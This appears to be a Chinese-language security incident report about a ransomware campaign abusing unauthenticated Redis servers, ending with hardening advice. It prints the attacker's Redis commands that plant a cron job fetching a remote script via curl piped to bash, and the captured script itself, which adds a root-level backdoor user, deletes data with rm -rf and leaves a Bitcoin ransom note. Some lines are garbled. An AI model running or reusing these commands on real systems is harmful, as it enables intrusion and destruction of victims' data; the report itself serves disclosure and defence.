#安全事件
9月10日下午15:06開始,阿裡雲官方首次發現一起規模化利用Redis 未授權通路漏洞進行加密貨币勒索的事件,阿裡雲上防禦系統在攻擊開始的10s内就已開啟全網攔截。
與以往的隻是通過算力竊取進行挖礦的攻擊事件不同,此次攻擊者在攻擊之初就是以勒索錢财作為第一目的的,攻擊者無懼暴露,非常猖狂。直接删除資料、加密資料也意味着攻擊者與防禦者之間已經沒有緩沖地帶,基本的攻防對抗将是赤裸裸的一場刺刀戰。
該高危漏洞早在半年前阿裡雲就釋出過預警,但是還是有不少使用者并未進行修改加以重視。阿裡雲安全專家提醒使用者參考文末方法,盡快完成漏洞修複或部署防禦,一旦被攻擊成功,整個伺服器的程式和資料都将會被删除!且很難恢複。
Redis應用簡介
Redis是一個開源的使用ANSI C語言編寫、支援網絡、可基于記憶體亦可持久化的日志型、Key-Value資料庫,并提供多種語言的API。從2010年3月15日起,Redis的開發工作由VMware主持。從2013年5月開始,Redis的開發由Pivotal贊助。
Redis漏洞原理
作為一個記憶體資料庫,redis 可通過周期性配置或者手動執行save指令,将緩存中的值寫入到磁盤檔案中。如果redis程序權限足夠,攻擊者就可以利用它的未授權漏洞來寫入計劃任務、ssh登入密鑰、webshell 等等,以達到執行任意指令的目的。
自2017年12月以來,由于該漏洞已經被大規模利用,如DDG等多個僵屍網絡都以該漏洞為目标進行迅速的繁殖和占領算力,并且各大僵屍網絡間都會互相删除彼此來保證自己對機器算力的掌握。
攻擊過程說明
● 首先攻擊者通過事先的掃描踩點,發現了這些公網可通路并且未設定密碼的機器
● 攻擊者嘗試連接配接這些機器,并且運作如下代碼:
config set dir /var/spool/cron/
config set dbfilename root
config 1 */10 * * * * curl -shttp://103.224.80.52/butterfly.sh | bash
save 通過上述指令,将下載下傳腳本:http://103.224.80.52/butterfly.sh并将該腳本寫入到計劃任務中,由計劃任務啟動執行。
由于在分析時,攻擊者感覺到我們的反向探查,已經将該腳本下線。但我們的蜜罐成功抓取到了該腳本如下:
#!/bin/bash
#*butterfly*
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
userdel -r redis
useradd -o -u 0 -g 0 redis &>/dev/null
echo "abcd-1234-!" |passwd--stdin redis &>/dev/null
rm -rf /root/*
rm -rf /home/*
rm -rf /opt/*
rm -rf /data/*
rm -rf /data*
mkdir -p /data
echo -e "\nWarning! \nYour File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact
us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop
thebackup after 24 hours. You are welcome! \nMail:[email protected]\nBitCoin:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny\n" > /root/Warning.txt
chmod +x /root/Warning.txt
cp /root/Warning.txt /Warning.txt
cp /root/Warning.txt /data/Warning.txt
echo -e "\nWarning! \nYour File andDataBase is downloaded and backed up on our secured servers. To recover yourlost data : Send 0.6 BTC to our BitCoin Address and Contact
us by eMail withyour server IP Address and a Proof of Payment. Any eMail without your server IPAddress and a Proof of Payment together will be ignored. We will drop
thebackup after 24 hours. You are ● 攻擊者要求給位址:3JPaDCoRnQatEEDoY59KtgF38GZiL5Kiny 發送0.6個比特币,否則将在24小時之内删除資料備份。
● 但是從這個腳本中可以明顯看出,攻擊者根本沒有進行備份,即使被攻擊者給了錢,也是要不回資料的。
截止到9月10日晚8點為止,該位址共收到了0.6個比特币的轉賬,并且都是在今日進行發送的,已經有受害者開始轉賬了。
安全建議
● 通過安全組限制對公網對Redis等服務的通路
● 通過修改redis.conf配置檔案,增加密碼認證,并隐藏重要指令
● 以低權限運作redis服務等
![軟考-軟體設計師 筆記五(系統安全分析與設計)資訊系統安全屬性對稱加密技術非對稱加密技術資訊摘要數字簽名數字信封與PGP各個網絡層次的安全保障網絡威脅與攻擊防火牆技術[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)